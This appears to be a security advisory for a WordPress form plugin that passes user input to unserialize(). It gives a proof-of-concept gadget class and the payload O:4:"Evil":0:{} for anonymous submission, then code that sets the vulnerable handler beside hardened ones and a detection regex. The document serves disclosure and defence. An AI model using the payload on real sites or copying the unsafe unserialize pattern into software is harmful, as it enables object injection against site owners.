The plugin unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.
To simulate a gadget chain, put the following code in a plugin:
```php
<?php
/* Plugin Name: Evil gadget PoC */

// Stand-in gadget: __wakeup() runs as soon as unserialize() rebuilds the object.
class Evil {
    public function __wakeup(): void {
        die("Arbitrary deserialization");
    }
}
```
1. Activate this plugin and create a simple form.
2. Embed the form in an existing page.
3. As an anonymous user, fill in the text field with `O:4:"Evil":0:{}` and submit the form.
4. You will see "Arbitrary deserialization" in the response, showing that `Evil::__wakeup()` ran.
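The following is an added example, not the plugin's own code, showing the unsafe pattern the advisory describes next to the hardened forms a maintainer would move to, plus a small input check a defender can log on. The `Evil` class, the field contents and the handler names are constructed for illustration; it assumes PHP 8 or later.

```php
<?php
// Added example (not code from the affected plugin). The class name, sample
// payload and handler names below are constructed for illustration.

class Evil {
    public function __wakeup(): void {
        echo "__wakeup() ran: a gadget was reached\n";
    }
}

// Constructed sample of what a form field can carry.
$untrusted = 'O:4:"Evil":0:{}';

// 1. Vulnerable: unserialize() on user input instantiates whatever class the
//    string names and runs its magic methods (__wakeup, __destruct, ...).
function vulnerable_handler(string $input): mixed {
    return unserialize($input);
}

// 2. Hardened: allowed_classes => false keeps arrays and scalars but turns
//    every object into __PHP_Incomplete_Class, so no magic method is invoked.
function hardened_unserialize(string $input): mixed {
    return unserialize($input, ['allowed_classes' => false]);
}

// 3. Preferred: do not use PHP serialization for user-controlled data at all.
//    JSON decoding can only yield arrays and scalars, never objects with behaviour.
function json_handler(string $input): ?array {
    $decoded = json_decode($input, true, 512, JSON_THROW_ON_ERROR);
    return is_array($decoded) ? $decoded : null;
}

// 4. Detection: a serialized PHP object has a recognisable "O:<len>:"<name>":"
//    prefix. Logging form submissions that match it gives an early signal of
//    someone probing for this class of bug.
function looks_like_serialized_object(string $input): bool {
    return (bool) preg_match('/(^|[;{])O:\d+:"[^"]+":\d+:\{/', $input);
}

echo "Vulnerable handler:\n";
vulnerable_handler($untrusted);

echo "Hardened handler, object class after unserialize():\n";
$obj = hardened_unserialize($untrusted);
var_dump($obj instanceof __PHP_Incomplete_Class);

echo "Detection check on the same input:\n";
var_dump(looks_like_serialized_object($untrusted));

echo "JSON handler on the same input:\n";
try {
    json_handler($untrusted);
} catch (JsonException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

Two points worth keeping in mind when applying this to a WordPress plugin. WordPress core's `maybe_unserialize()` wrapper passes the data straight to `unserialize()` without an `allowed_classes` restriction, so routing the input through it does not remove the issue. And `allowed_classes => false` only stops object instantiation; if the handler later needs structured data from the field, switching the wire format to JSON removes the gadget surface entirely rather than merely blunting it.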